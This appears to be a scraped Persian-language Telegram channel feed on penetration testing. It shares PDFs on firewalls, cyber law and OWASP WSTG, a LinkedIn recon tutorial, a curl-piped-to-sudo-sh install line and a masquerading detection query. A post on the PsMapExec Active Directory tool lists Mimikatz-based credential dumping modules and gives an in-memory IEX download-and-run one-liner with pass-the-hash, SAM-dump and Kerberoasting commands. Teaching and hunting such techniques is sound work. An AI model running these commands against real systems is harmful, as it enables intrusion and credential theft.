Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
Media is too big
VIEW IN TELEGRAM
در سالنامه ایرانی بیستم مهر ماه روز بزرگ‌داشت رند شیراز(حافظ) است.

هرچند تابی نمانده و نه دلی...
بماند به یادگار...
شاید سال دیگر شادمانه‌تر دیدیم‌اش
که بندی نبود، ستمی نبود، دل‌ها خوش بودند
و جان‌ها شاداب و ...

جان، بی جمال ِ جانان میل ِ جهان ندارد
هر کس که این ندارد، حقا که آن ندارد

با هیچ‌کس نشانی زآن دل‌ستان ندیدم
یا من خبر ندارم؛ یا او نشان ندارد

هر شبنمی در این ره صد بحر ِ آتشین است
دردا که این معما شرح و بیان ندارد

سرمنزل ِ فراغت نتوان زِ دست دادن
ای ساروان! فروکش! ک‌این رَه کران ندارد

چنگ ِ خمیده قامت می‌خوانَد ت به عشرت
بشنو! که پند ِ پیران هیچ‌ات زیان ندارد

ای دل! طریق ِ رندی از محتسب بیاموز
مست است و در حق ِ او کس این گمان ندارد

احوال ِ گنج ِ قارون -ک‌ایام داد بر باد-
در گوش ِ دل فروخوان؛ تا زَر نهان ندارد

گر خود، رقیب، شمع است؛ اَسرار از او بپوشان
ک‌آن شوخ ِ سَربُریده، بند ِ زبان ندارد

کس در جهان ندارد یک بنده هم‌چو حافظ
زیرا که: چون تو شاهی کس در جهان ندارد.

خوانش: فریدون فرح‌اندوز

روز بزرگداشت"رند شیرازی"

@TryHackBox
10
مقدمات فایروال.pdf
778.8 KB
✏️ مقاله تالیف شده
مقدمات فایروال


✍️نویسنده
@TryHackBox | The Chaos

#FireWall #Cybersecurity #Networking
3🔥1
Recon-User-LinkedIn-Part1-THB-Team.pdf
1.1 MB
🔖 در این آموزش از تیم TryHackBox، به بررسی reconnaissance بر پایه LinkedIn می‌پردازیم. یاد می‌گیرید چطور ساختار سازمانی رو نقشه‌برداری کنید، اهداف کلیدی رو شناسایی کنید و از ابزارهایی مثل theHarvester و Maltego برای جمع‌آوری اطلاعات عمومی استفاده کنید. مثال‌های عملی، تمرین‌های گام‌به‌گام و چک‌لیست اخلاقی هم داخلش هست.
@TryHackBox | Github | YouTube | Group
#Recon #OSINT #Linkedin
linkedin_results_template.csv
683 B
این فایل مربوط به آموزش بالا میباشد .
@TryHackBox
target_list_template.csv
723 B
این فایل مربوط به آموزش بالا میباشد .
@TryHackBox
5👍5❤‍🔥1
🔖 grype v0.100.0

اسکنر آسیب‌پذیری برای containers و فایل سیستم ها

نصب:
curl -sSfL https://get.anchore.io/grype | sudo sh -s  -b /usr/local/bin

راه‌اندازی:
grype  scope all-layers

https://github.com/anchore/grype

@TryHackBox
#grype #soft #golang
قوانین سایبری در ایران و مجازات.pdf
831.3 KB
آشنایی با قوانین جرایم سایبری در ایران

💢 اگر در حوزه امنیت سایبری، تست نفوذ یا ردتیم فعالیت می‌کنی، حتما باید بدونی چه کارهایی جرم محسوب میشن و مجازاتشون چیه.

یه اشتباه کوچیک در دنیای سایبری می‌تونه به جرم بزرگ تبدیل بشه!

💢 قبل از هر تست نفوذ یا فعالیت فنی، قوانین سایبری ایران رو بشناس.
@TryHackBox
#قوانین_سایبری
👍4👎2🐳1
🔖 PsMapExec v0.9.0

یک به ‌روزرسانی برای ابزار post-exploitation در Active Directory که با PowerShell نوشته شده منتشر شد.

به روز رسانی

پشتیبانی از چند دامنه

بهبود عملکرد از طریق Proxifier / تونل‌های SSH

امکان روشن/خاموش کردن RDP
ماژول‌های جدید:

EventCreds


ماژول ‌های اضافی در LDAP:
GMSA
ConstrainedDelegation
UnconstrainedDelegation
AdminCount
ComputerSIDs
UserDenoscriptions
UserLogonRestrictions
UserPasswords
UserSIDs

روش‌ها (پروتکل) فعلی که پشتیبانی می‌شوند:
RDP
SessionHunter
SMB
SMB Signing
LDAP / LDAPS
SSH
Spraying
VNC
WinRM
WMI
MSSQL
Kerberoast

ماژول ‌های پیاده ‌سازی ‌شده:
Amnesiac — اجرای payloadهای Amnesiac C2
ConsoleHistory — تاریخچه در PowerShell
Files — فایل‌ها در دایرکتوری‌های متداول
KerbDump — دامپ تیکت‌های Kerberos
eKeys — دامپ کلیدها (Mimikatz)
LogonPasswords — دامپ پسوردهای لاگ‌آن (Mimikatz)
LSA — دامپ LSA (Mimikatz)
NTDS — پیاده‌سازی DCsync
SAM — دامپ SAM


https://viperone.gitbook.io/pentest-everything/psmapexec

@TryHackBox
#PowerShell #pentest #redteam #psmapexec
3👍3
Try Hack Box
🔖 PsMapExec v0.9.0 یک به ‌روزرسانی برای ابزار post-exploitation در Active Directory که با PowerShell نوشته شده منتشر شد. به روز رسانی پشتیبانی از چند دامنه بهبود عملکرد از طریق Proxifier / تونل‌های SSH امکان روشن/خاموش کردن RDP ماژول‌های جدید: EventCreds…
اجرای ابزار از حافظه:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")


مثال‌ها:
اجرای با کاربر جاری
PsMapExec -Targets All -Method [Method]

با پسورد
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

با هش
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

با تیکت
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

دامپ فایل SAM
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput

استفاده از ماژول ‌ها
PsMapExec -Targets All -Method [Method] -Module [Module]


@TryHackBox
#pentest #powershell #psmapexec
7
قوانین سایبری بین‌المللی.pdf
601.2 KB
آشنایی با قوانین سایبری در سطح بین‌ و المللی

بدون شناخت قوانین جهانی امنیت سایبری، هر فعالیت فنی میتونه دردسرساز بشه!

این فایل شامل خلاصه‌ای از مهم‌ترین قوانین سایبری در اروپا، آمریکا و سایر کشورهاست.

💢 قوانین سایبری فقط مخصوص ایران نیست .

💢 این فایل یه نگاه جهانی داره به قانون‌هایی که درباره هک، داده، و امنیت سایبری تصویب شدن.

حتما بخون قبل از هر تست یا پروژه فنی
@TryHackBox
#قوانین_سایبری_بین‌المللی #قوانین_سایبری
5👍1
امروز برای اولین ‌بار سراغ یک تکنیک کاربردی می ‌ریم که برای شکار تهدید خیلی مفیده

Masquerading: Match Legitimate Resource Name or Location (T1036.005).

مثل همیشه، با یک مثال شروع می‌کنیم

https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/

C:\ProgramData\Intel\ping.exe

C:\Users\Public\ping.exe


همان‌طور که مشاهده می‌شود، مهاجمان فایل‌های مخرب را شبیه ابزارِ معتبر ping جلوه داده‌اند. چنین مواردی را می‌توان مستند سازی کرد و هم برای تشخیص و هم برای شکار تهدید از آن ‌ها استفاده کرد برای مثال:
event_type: "processcreatewin"

AND

proc_file_path: "ping.exe"

AND NOT

proc_file_path: ("windows\system32" OR "windows\syswow64")


@TryHackBox
#سوال
دوستان فکر کنید در یک مصاحبه هستید و ازتون سوال میپرسند :

بزرگ‌ترین نقطه ‌قوت شما چیست؟

جواب هاتون کامنت کنید
6👏2
🔖 شاخص منابع شناخته‌ شده

ابزاری آنلاین برای اسکن یک وب‌سایت و پیدا کردن اطلاعات درباره آن:

- robots.txt file
- security.txt
- ads.txt
- assetlinks.json
- app-ads.txt
- gpc.json

و دیگر موارد.

https://well-known.dev/

@TryHackBox
7
#سوال
چرا باید هنگام اسکن یک sniffer اجرا کنیم؟

#جواب اخرشب تو همین پست گذاشته می شود .

جواب هاتون کامنت کنید
8
🛡 راهنمای نهایی تست امنیت وب (WSTG)

📚 معرفی یک مرجع بی‌نظیر برای متخصصان امنیت:

Web Security Testing Guide (WSTG)
جامع‌ترین راهنمای تست امنیت برنامه‌های تحت وب

مشخصات کتاب:
- ناشر: OWASP Foundation 🏢
- سازمان منتشرکننده: Open Web Application Security Project
- نوع محتوا: راهنمای رایگان و متن‌باز
- به‌روزرسانی: نسخه اخیر (v4.2)

🎯 چه چیزی داخلش پیدا می‌کنید:
تست احراز هویت و مدیریت نشست
تست کنترل دسترسی
تست تزریق (SQLi, XSS, Command Injection)
تست منطق کسب‌وکار
تست امنیت API
و ده‌ها فصل تخصصی دیگر...

🚀 چرا WSTG رو دانلود کنم؟
- منبع رسمی OWASP معتبرترین مرجع جهانی
- پوشش کامل چرخه تست امنیتی

✍️نویسنده
@TryHackBox | The Chaos

#WSTG #WebSecurity #OWASP #SecurityTesting
#CyberSecurity
6👍3🤔2
wstg-v4.2.pdf
9.7 MB
🛡 راهنمای نهایی تست امنیت وب (WSTG)
@TryHackBox
#Book
👍6
hidden links.pdf
6.8 MB
🔖 لینک‌ های پنهان: تحلیل خانواده‌ های مخفی اپلیکیشن‌ های VPN .

💠 در این مقاله، ما حریم خصوصی و امنیت اپلیکیشن‌های VPN را که ارائه‌ دهندگان آنها به عمد مالکیت خود را پنهان می‌کنند، تحلیل می‌کنیم. ما از روابط پنهان بین ارائه‌ دهندگان VPN که به ظاهر متمایز هستند، به عنوان یک نشانگر غیرمستقیم از رفتار فریبنده استفاده می‌کنیم. سپس به دنبال مسائل امنیتی خاص VPN در اپلیکیشن‌ های ارائه‌ دهندگان فریبنده هستیم تا نقص‌ های مشترک را کشف کنیم.

@TryHackBox | Github | YouTube | Group
👍10